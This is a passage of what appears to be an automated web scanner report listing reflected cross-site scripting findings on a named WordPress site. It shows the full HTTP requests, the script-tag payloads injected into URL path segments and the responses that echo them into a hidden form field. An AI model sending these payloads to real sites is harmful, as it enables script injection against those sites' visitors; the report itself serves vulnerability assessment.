The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d7ed"><script>alert(1)</script>fcc57779af6 was submitted in the REST URL parameter 4. This input was echoed as 4d7ed\"><script>alert(1)</script>fcc57779af6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/tabbed-widgets/tabbed-widgets.php4d7ed"><script>alert(1)</script>fcc57779af6 HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:41 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:41 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/plugins/tabbed-widgets/tabbed-widgets.php4d7ed\"><script>alert(1)</script>fcc57779af6" />
...[SNIP]...

1.228. http://www.sitebrand.com/wp-content/themes/DropdownMenuVersion/purecorpwp/pagenavi-css.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/themes/DropdownMenuVersion/purecorpwp/pagenavi-css.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58ffe"><script>alert(1)</script>9e6c5dc642 was submitted in the REST URL parameter 1. This input was echoed as 58ffe\"><script>alert(1)</script>9e6c5dc642 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content58ffe"><script>alert(1)</script>9e6c5dc642/themes/DropdownMenuVersion/purecorpwp/pagenavi-css.css HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:32 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content58ffe\"><script>alert(1)</script>9e6c5dc642/themes/DropdownMenuVersion/purecorpwp/pagenavi-css.css" />
...[SNIP]...

1.229. http://www.sitebrand.com/wp-content/themes/DropdownMenuVersion/purecorpwp/pagenavi-css.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/themes/DropdownMenuVersion/purecorpwp/pagenavi-css.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f790f"><script>alert(1)</script>b39cc96c08f was submitted in the REST URL parameter 2. This input was echoed as f790f\"><script>alert(1)</script>b39cc96c08f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themesf790f"><script>alert(1)</script>b39cc96c08f/DropdownMenuVersion/purecorpwp/pagenavi-css.css HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:34 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/themesf790f\"><script>alert(1)</script>b39cc96c08f/DropdownMenuVersion/purecorpwp/pagenavi-css.css" />
...[SNIP]...

1.230. http://www.sitebrand.com/wp-content/themes/DropdownMenuVersion/purecorpwp/pagenavi-css.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/themes/DropdownMenuVersion/purecorpwp/pagenavi-css.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45d9f"><script>alert(1)</script>38b3eb32f4b was submitted in the REST URL parameter 3. This input was echoed as 45d9f\"><script>alert(1)</script>38b3eb32f4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/DropdownMenuVersion45d9f"><script>alert(1)</script>38b3eb32f4b/purecorpwp/pagenavi-css.css HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:35 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/themes/DropdownMenuVersion45d9f\"><script>alert(1)</script>38b3eb32f4b/purecorpwp/pagenavi-css.css" />
...[SNIP]...

1.231. http://www.sitebrand.com/wp-content/themes/DropdownMenuVersion/purecorpwp/pagenavi-css.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/themes/DropdownMenuVersion/purecorpwp/pagenavi-css.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 983fb"><script>alert(1)</script>ad9e2f97248 was submitted in the REST URL parameter 4. This input was echoed as 983fb\"><script>alert(1)</script>ad9e2f97248 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/DropdownMenuVersion/purecorpwp983fb"><script>alert(1)</script>ad9e2f97248/pagenavi-css.css HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:36 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/themes/DropdownMenuVersion/purecorpwp983fb\"><script>alert(1)</script>ad9e2f97248/pagenavi-css.css" />
...[SNIP]...

1.232. http://www.sitebrand.com/wp-content/themes/DropdownMenuVersion/purecorpwp/pagenavi-css.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-content/themes/DropdownMenuVersion/purecorpwp/pagenavi-css.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e593"><script>alert(1)</script>fd2c43d5993 was submitted in the REST URL parameter 5. This input was echoed as 9e593\"><script>alert(1)</script>fd2c43d5993 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/DropdownMenuVersion/purecorpwp/pagenavi-css.css9e593"><script>alert(1)</script>fd2c43d5993 HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:39 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:39 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-content/themes/DropdownMenuVersion/purecorpwp/pagenavi-css.css9e593\"><script>alert(1)</script>fd2c43d5993" />
...[SNIP]...

1.233. http://www.sitebrand.com/wp-includes/js/jquery/jquery.form.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-includes/js/jquery/jquery.form.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aa21"><script>alert(1)</script>10ae98f8219 was submitted in the REST URL parameter 1. This input was echoed as 9aa21\"><script>alert(1)</script>10ae98f8219 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes9aa21"><script>alert(1)</script>10ae98f8219/js/jquery/jquery.form.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:41 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:41 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-includes9aa21\"><script>alert(1)</script>10ae98f8219/js/jquery/jquery.form.js" />
...[SNIP]...

1.234. http://www.sitebrand.com/wp-includes/js/jquery/jquery.form.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-includes/js/jquery/jquery.form.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fb3d"><script>alert(1)</script>e88687dbfdc was submitted in the REST URL parameter 2. This input was echoed as 5fb3d\"><script>alert(1)</script>e88687dbfdc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js5fb3d"><script>alert(1)</script>e88687dbfdc/jquery/jquery.form.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:43 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-includes/js5fb3d\"><script>alert(1)</script>e88687dbfdc/jquery/jquery.form.js" />
...[SNIP]...

1.235. http://www.sitebrand.com/wp-includes/js/jquery/jquery.form.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-includes/js/jquery/jquery.form.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7802"><script>alert(1)</script>497f51b15d0 was submitted in the REST URL parameter 3. This input was echoed as f7802\"><script>alert(1)</script>497f51b15d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jqueryf7802"><script>alert(1)</script>497f51b15d0/jquery.form.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:45 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-includes/js/jqueryf7802\"><script>alert(1)</script>497f51b15d0/jquery.form.js" />
...[SNIP]...

1.236. http://www.sitebrand.com/wp-includes/js/jquery/jquery.form.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-includes/js/jquery/jquery.form.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdf46"><script>alert(1)</script>266e70571c5 was submitted in the REST URL parameter 4. This input was echoed as cdf46\"><script>alert(1)</script>266e70571c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery/jquery.form.jscdf46"><script>alert(1)</script>266e70571c5 HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:46 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:46 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-includes/js/jquery/jquery.form.jscdf46\"><script>alert(1)</script>266e70571c5" />
...[SNIP]...

1.237. http://www.sitebrand.com/wp-includes/js/jquery/jquery.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b90a6"><script>alert(1)</script>65258fd8b85 was submitted in the REST URL parameter 1. This input was echoed as b90a6\"><script>alert(1)</script>65258fd8b85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includesb90a6"><script>alert(1)</script>65258fd8b85/js/jquery/jquery.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:41 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:41 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-includesb90a6\"><script>alert(1)</script>65258fd8b85/js/jquery/jquery.js" />
...[SNIP]...

1.238. http://www.sitebrand.com/wp-includes/js/jquery/jquery.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97e97"><script>alert(1)</script>a925be03a3c was submitted in the REST URL parameter 2. This input was echoed as 97e97\"><script>alert(1)</script>a925be03a3c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js97e97"><script>alert(1)</script>a925be03a3c/jquery/jquery.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:44 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:44 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-includes/js97e97\"><script>alert(1)</script>a925be03a3c/jquery/jquery.js" />
...[SNIP]...

1.239. http://www.sitebrand.com/wp-includes/js/jquery/jquery.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63710"><script>alert(1)</script>af3c0e968c5 was submitted in the REST URL parameter 3. This input was echoed as 63710\"><script>alert(1)</script>af3c0e968c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery63710"><script>alert(1)</script>af3c0e968c5/jquery.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:45 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-includes/js/jquery63710\"><script>alert(1)</script>af3c0e968c5/jquery.js" />
...[SNIP]...

1.240. http://www.sitebrand.com/wp-includes/js/jquery/jquery.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b253b"><script>alert(1)</script>aa32dcf57d0 was submitted in the REST URL parameter 4. This input was echoed as b253b\"><script>alert(1)</script>aa32dcf57d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery/jquery.jsb253b"><script>alert(1)</script>aa32dcf57d0 HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:46 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:46 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-includes/js/jquery/jquery.jsb253b\"><script>alert(1)</script>aa32dcf57d0" />
...[SNIP]...

1.241. http://www.sitebrand.com/wp-includes/js/jquery/ui.core.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-includes/js/jquery/ui.core.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7d91"><script>alert(1)</script>cfb53e500cb was submitted in the REST URL parameter 1. This input was echoed as b7d91\"><script>alert(1)</script>cfb53e500cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includesb7d91"><script>alert(1)</script>cfb53e500cb/js/jquery/ui.core.js HTTP/1.1
Host: www.sitebrand.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:33:40 GMT
Server: Apache/2.0.63
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.sitebrand.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:40 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<input type="hidden" name="redirect_to" value="/wp-includesb7d91\"><script>alert(1)</script>cfb53e500cb/js/jquery/ui.core.js" />
...[SNIP]...

1.242. http://www.sitebrand.com/wp-includes/js/jquery/ui.core.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sitebrand.com
Path:   /wp-includes/js/jquery/ui.core.js

